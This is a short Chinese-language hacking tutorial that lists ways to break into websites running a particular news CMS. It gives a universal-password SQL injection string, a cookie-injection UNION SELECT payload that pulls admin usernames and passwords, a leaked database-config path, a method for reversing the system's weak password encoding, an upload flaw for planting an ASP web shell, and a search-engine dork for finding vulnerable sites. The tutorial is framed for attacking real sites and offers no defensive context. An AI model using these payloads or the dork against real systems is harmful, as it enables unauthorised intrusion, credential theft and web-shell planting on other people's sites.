利用的入侵方法: 1.万能密码 ’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。
2.cookie注入漏洞 SQL通用防注入系统3.0版 火狐技术联盟存在cookie注入漏洞 -1 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin
3.暴库漏洞 admin/adminconn.inc
4.加密方法 原理:密文中字母所对应的ascii码减去字母在密文中所处的位数其结果为原密码的所对应的ascii码例如:admin加密后为bfpms,对bfpms解密步骤为:b对应的ascii码为98,它在密文中所处的位数为1,则它原密码的所对应的ascii码为98-1=97,ascii码为97的字符为a,f对应的ascii码为102,它在密文中所处的位数为2,则它原密码的所对应的ascii码为102-2=100,ascii码为100的字符为d
5.上传漏洞 admin/uploadPic.asp?actiontype=mod&picname=ma.asp
最后大家可以使用google或baidu进行查找雷驰系统 inurl:onews.asp?id=
谢谢大家观看!再见! BY 网络任我行 QQ:43655982 |